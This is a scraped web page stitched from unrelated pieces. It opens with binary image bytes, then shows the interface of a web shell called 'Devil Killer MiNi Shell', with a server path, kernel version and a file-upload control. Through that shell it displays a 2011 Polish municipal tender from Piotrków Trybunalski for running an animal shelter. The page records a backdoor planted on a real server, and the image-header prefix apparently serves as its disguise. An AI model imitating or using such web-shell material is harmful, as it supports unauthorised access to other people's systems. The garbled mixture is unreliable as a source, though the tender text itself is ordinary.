JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111202/409426-N-2011.html

<p class="kh_header"><b>Piotrków Trybunalski: Prowadzenie Schroniska dla Bezdomnych Zwierząt w Piotrkowie Trybunalskim w 2012 roku.</b><br>
<b>Numer ogłoszenia: 409426 - 2011; data zamieszczenia: 02.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Piotrków Trybunalski , ul. Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7327796, faks 044 7327798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie Schroniska dla Bezdomnych Zwierząt w Piotrkowie Trybunalskim w 2012 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Prowadzenie Schroniska dla Bezdomnych Zwierząt w Piotrkowie Trybunalskim w 2012 roku.

I. Opis obiektu, na którym usytuowane jest Schronisko dla Bezdomnych Zwierząt, zawiera załącznik nr 1 do wzoru umowy.
II. Prowadzenie schroniska dla bezdomnych zwierząt w zakresie, o którym mowa                 w niniejszym ustępie  oraz w ust. 3 : 
1.	stosowanie się do postanowień regulaminu schroniska - stanowiącego załącznik nr 2 do wzoru umowy,
2.	całodobowe sprawowanie opieki nad przebywającymi w schronisku zwierzętami,
3.	codzienne karmienie i pielęgnowanie zwierząt zgodnie z obowiązującymi wymogami i normami żywienia zwierząt,
4.	całodobową dyspozycyjność oraz wyznaczenie osoby odpowiedzialnej za pełnienie dyżuru pod ogólnodostępnym numerem telefonu w schronisku,
5.	zapobieganie bezdomności zwierząt poprzez organizowanie aukcji, sprzedaży, oddawanie do adopcji,
6.	ograniczenie populacji zwierząt w schronisku poprzez ich sterylizację                         i kastrację -  nie mniej niż 200 zwierząt. W pierwszej kolejności te zwierzęta, które opuszczają schronisko (przekazywanie do adopcji),
7.	zapewnienie stałej opieki weterynaryjnej nad zwierzętami w schronisku                  w zakresie kontroli stanu zdrowia, profilaktyki i leczenia oraz zwalczania pasożytów wewnętrznych i zewnętrznych,
8.	szczepienie zwierząt przeciwko wściekliźnie zgodnie z obowiązującymi przepisami. Szczepieniami muszą być objęte wszystkie zwierzęta przybywające do schroniska + znajdujące się w schronisku,
9.	szczepienia profilaktyczne zwierząt przeciw chorobom zakaźnym. Szczepieniami muszą być objęte wszystkie zwierzęta przybywające do schroniska + znajdujące się w schronisku,
10.	obserwację zwierząt, które pokąsały człowieka lub podejrzanych o wściekliznę oraz powiadomienie Powiatowego Lekarza Weterynarii o tym fakcie,
11.	współpraca z lecznicami dla zwierząt w zakresie trwałego oznakowania psów przebywających w schronisku, zgodnie ze wskazaniami Zamawiającego,
12.	wyłapywanie (odławianie) bezdomnych zwierząt - wyłącznie w granicach administracyjnych Miasta Piotrkowa Trybunalskiego w ramach akcji ogłoszonej przez Prezydenta Miasta oraz zgłoszeń mieszkańców Miasta Piotrkowa Trybunalskiego do organu Policji, Straży  Miejskiej lub schroniska i ich transport do schroniska,
13.	przyjmowanie i utrzymywanie w schronisku zwierząt bezdomnych wyłącznie            z terenu Miasta Piotrkowa Trybunalskiego,
14.	wyłapywanie bezdomnych psów i kotów przy użyciu wyłącznie urządzeń specjalistycznych przeznaczonych do wyłapywania zwierząt,
15.	zapewnienie pomocy weterynaryjnej oraz służb zabezpieczających akcję wyłapywania - organ Policji, Straży Miejskiej, podczas wyłapywania (odławiania) bezdomnych zwierząt w przypadku konieczności użycia środków farmakologicznych,
16.	reagowanie na zgłoszenia osób fizycznych i prawnych - wyjazdy na interwencję:
a) w przypadku zgłoszeń dotyczących zwierząt agresywnych stwarzających 
    zagrożenie dla  ludzi - niezwłocznie, jednak nie później niż w ciągu 1 godziny od  momentu przyjęcia zgłoszenia,
b) w przypadku zgłoszeń dotyczących rannych zwierząt w  wyniku wypadku -  niezwłocznie, jednak nie później niż  w ciągu 2 godzin od momentu przyjęcia zgłoszenia,
c) w innych przypadkach - niezwłocznie, jednak nie później niż w dniu przyjęcia zgłoszenia,
17.	zapewnienie opieki lekarskiej w stosunku do zwierząt poszkodowanych                          w wypadkach ulicznych,
18.	prowadzenie wykazu zwierząt przebywających w schronisku, zawierającego:
a)	opis zwierzęcia, w tym jego gatunek, wiek, płeć, maść i oznakowanie oraz imię,
b)	datę przyjęcia do schroniska oraz imię, nazwisko i adres osoby przekazującej zwierzę do schroniska lub inne okoliczności, na podstawie których zwierzę znalazło się w schronisku,
c)	dane dotyczące kwarantanny,
d)	dane dotyczące przeprowadzonych szczepień i zabiegów weterynaryjnych,   oznakowanych,
e)	datę opuszczenia schroniska oraz imię, nazwisko i adres osoby, której przekazano zwierzę,
f)	datę śmierci z podaniem przyczyny,
19.	wydawanie zwierząt ze schroniska wraz z wypisem z wykazu zawierającym informacje, o których mowa w pkt 18 ust. a),b),d),
20.	prowadzenie książki kontroli weterynaryjnej, do której wpisywane są zalecenia urzędowego lekarza weterynarii,
21.	zakup leków i innego wyposażenia gabinetu weterynaryjnego,
22.	oddawanie do utylizacji zwłok zwierząt padłych lub uśpionych, 
23.	bieżącą naprawę i konserwację obiektów, urządzeń i wyposażenia schroniska oraz utrzymanie czystości w obiektach i na terenie schroniska,  w tym usuwanie nieczystości,
24.	przeprowadzanie dezynsekcji, dezynfekcji oraz deratyzacji,
25.	zabezpieczenie obiektu we wszystkie środki potrzebne do normalnego funkcjonowania schroniska, w tym zabezpieczenie pod kątem przestrzegania przepisów przeciwpożarowych i BHP w zakresie wynikającym z eksploatacji obiektu,
26.	dbanie o powierzony majątek Miasta, nie dopuszczając do jego dekapitalizacji;
27.	całodobowe zabezpieczenie terenu i obiektu,
28.	zgłaszanie Zamawiającemu uwag o stanie technicznym obiektów,
29.	obsługa kotłowni wraz z instalacjami (w tym zakup opału) oraz obsługa kotłów warzelnych ciśnieniowych przez osoby do tego uprawnione,
30.	utrzymywanie w sprawności wszystkich urządzeń wraz z instalacjami zgodnie z wymaganiami stosownych przepisów w tym zakresie oraz przeprowadzanie przeglądów technicznych zgodnie z przepisami prawa budowlanego,
31.	utrzymanie porządku na istniejących terenach zieleni i zakładanie nowych              w obrębie schroniska,
32.	prowadzenie książek obiektów zgodnie z obowiązującymi przepisami prawa,
33.	zawieranie umów na: dostawę energii elektrycznej, wody, odprowadzanie ścieków, wywóz odpadów stałych, telefon, internet oraz utylizację zwłok zwierzęcych z odpowiednimi instytucjami w zakresie obowiązywania umowy oraz ponoszenie kosztów z tego tytułu,
34.	organizowanie, zabieganie o dodatkowe fundusze i inne środki niezbędne do prawidłowego utrzymania i funkcjonowania schroniska, w instytucjach                        i jednostkach spoza Urzędu Miasta,
35.	przedkładanie informacji raz na miesiąc, zawierających dane o zwierzętach  osobno psy i koty, z wyszczególnieniem numeru inwentarzowego:
a)	przyjętych do schroniska, 
b)	oddanych do adopcji,
c)	poddanych szczepieniom przeciwko wściekliźnie i chorobom zakaźnym,
d)	poddanych eutanazji z podaniem przyczyny,
e)	padłych,
           a ponadto dla zwierząt oznakowanych z podaniem: 
a)	nr czipa,
b)	oddanych do adopcji:
- na miasto Piotrków Tryb.,
- poza miasto,
- poza kraj,
c) padłych,
d) poddanych eutanazji,
36.	przedkładanie sprawozdań finansowo - rzeczowych (raz na miesiąc), dotyczących rozliczeń wydatków związanych z prowadzeniem schroniska wraz   z kserokopiami faktur i rachunków. Ponadto informacji dotyczących rozliczeń wydatków związanych z wyjazdami na interwencje do wglądu karty drogowe na każdy używany samochód wykorzystywany do interwencji,
37.	założenie, prowadzenie i systematyczne aktualizowanie strony internetowej schroniska dla bezdomnych zwierząt.  
 III.  Pomoc wolno żyjącym kotom poprzez ich sterylizację/ kastrację: zabiegiem objętych będzie nie więcej niż 80, nie  mniej niż 70 zwierząt, w tym ich dokarmianie                   poprzez przekazanie nieodpłatnie dokarmiającym koty  karmy dla kotów o wartości do 200,00 zł miesięcznie.

Czynności obejmujące udzielenie pomocy wolno żyjącym kotom:

1)	poinformowanie społeczeństwa o możliwości wykonania sterylizacji/kastracji kotów wolno żyjących (bezdomnych)  oraz ich dokarmiania ze środków Miasta Piotrkowa Tryb. W celu wykonania zabiegu zwierzę należy dostarczyć do schroniska.
2)	przeprowadzenie wywiadu i rozeznania mającego na celu stwierdzenia, że kot jest zwierzęciem wolno żyjącym,
3)	stosowanie się do postanowień regulaminu wydawania wniosków na sterylizację bądź kastrację kotów wolno żyjących (bezdomnych) - załącznik nr 3 do wzoru umowy,
4)	wydawanie wniosków - skierowań na sterylizację/kastrację tylko do wyczerpania limitów przyznanych na udzielanie pomocy wolno żyjącym kotom,
5)	comiesięczne rozliczanie w formie sprawozdania - z wykonanych zabiegów sterylizacji/ kastracji wolno żyjących kotów/kotek oraz przekazanej karmy dla kotów, do którego dołączone zostaną kserokopie zrealizowanych wniosków. 

Zamawiający wymaga, aby przy wykonywaniu ww. czynności, były przestrzegane  
       przepisy wynikające:
1)  z ustawy z dnia 21.08.1997 r. o ochronie zwierząt ( Dz. U. z 2003 r., Nr 106, poz. 1002 z późn. zm.), 
      2)  z Rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 4 stycznia 2008 r.                   w sprawie szczegółowych wymagań weterynaryjnych dla prowadzenia działalności w zakresie organizowania targów, wystaw, pokazów lub konkursów zwierząt  (Dz. U z 2008 r., Nr 11, poz. 67),
      3)   z Rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 23 czerwca 2004 r.
w sprawie szczegółowych wymagań weterynaryjnych dla prowadzenia schronisk  dla zwierząt ( Dz. U. z 2004 r., Nr 158, poz. 1657),
      4)   ustawy z dnia 11.03.2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób  zakaźnych zwierząt (Dz. U. z 2008 r. , Nr 213, poz. 1342 z późn. zm.),
      5) Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia                      26.08.1998 r. w sprawie zasad i warunków wyłapywania bezdomnych zwierząt (Dz. U. z 1998 r. , nr 116, poz. 753),
       6) z uchwały Rady Miasta Piotrkowa Trybunalskiego w sprawie wyłapywania bezdomnych zwierząt oraz  o rozstrzyganiu o dalszym  postępowaniu z nimi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.38.00.00-1, 85.20.00.00-3, 98.38.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, zamawiający uzna za spełniony w przypadku, gdy wykonawca:
a)	Przedłoży zezwolenie na prowadzenie schronisk dla bezdomnych zwierząt, o którym mowa w art. 7 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U. z 2005 r., Nr 236, poz. 2008 z późn. zm.).
Uwaga! Powyższy warunek dotyczy wyłącznie przedsiębiorców.
Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania wiedzy i doświadczenia, zamawiający uzna za spełniony w przypadku, gdy wykonawca:
a)	Wykaże co najmniej jedno zamówienie (wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) odpowiadające rodzajem przedmiotowi niniejszego zamówienia tj. prowadzenie schroniska dla bezdomnych zwierząt        o wartości co najmniej 100 000,00 PLN - wg załącznika nr  4.
b)	Załączy referencje lub protokoły odbioru końcowego potwierdzające, że usługi wyszczególnione w załączniku nr  4 zostały wykonane należycie.
Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący, dysponowania odpowiednim potencjałem technicznym zostanie przez zamawiającego uznany za spełniony w przypadku, gdy wykonawca wykaże i przedłoży: 
 a)	Oświadczenie o dysponowaniu niezbędnym do wykonania zamówienia sprzętem, którym dysponuje lub będzie dysponował wykonawca, tj.: środek transportu przystosowany do przewozu schwytanych zwierząt spełniający warunki art. 24 ustawy o ochronie zwierząt, chłodnia na zwłoki, chłodnia na żywność - wg załącznika nr 7

Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący, dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia,zostanie przez zamawiającego uznany za spełniony w przypadku, gdy wykonawca wykaże i przedłoży: 
a)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz                              z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami:
- co najmniej 5 pielęgniarzy zwierząt,
- lekarz weterynarii, - wg załącznika nr 3.
Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 1.
2.	Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej (należy załączyć oryginał lub kseropię potwierdzoną przez notariusza).
3.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
4.	Zezwolenie na prowadzenie schronisk dla bezdomnych zwierząt, o którym mowa w art. 7 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U. z 2005 r., Nr 236, poz. 2008 z późn. zm. ). 
Uwaga! Powyższe dotyczy wyłącznie przedsiębiorców.
6.	Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp -  wg załącznika nr 2.
7.	Oświadczenie o niezaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne - wg załącznika nr 5.
8.	Umowę lub wstępne pisemne zapewnienie na odbiór padłych zwierząt przez zakład specjalistyczny;
09.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 6.
10.	Wykaz niezbędnego do wykonania zamówienia sprzętu, którym dysponuje lub będzie dysponował wykonawca - wg załącznika nr 7;
11.	Oświadczenie o dyspozycyjności - wg załącznika nr 8;
12.	Oświadczenie o pozyskaniu środków finansowych z instytucji i jednostek spoza Urzędu Miasta w wysokości niezbędnej do prawidłowego utrzymania                          i funkcjonowania schroniska - wg załącznika nr 9;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
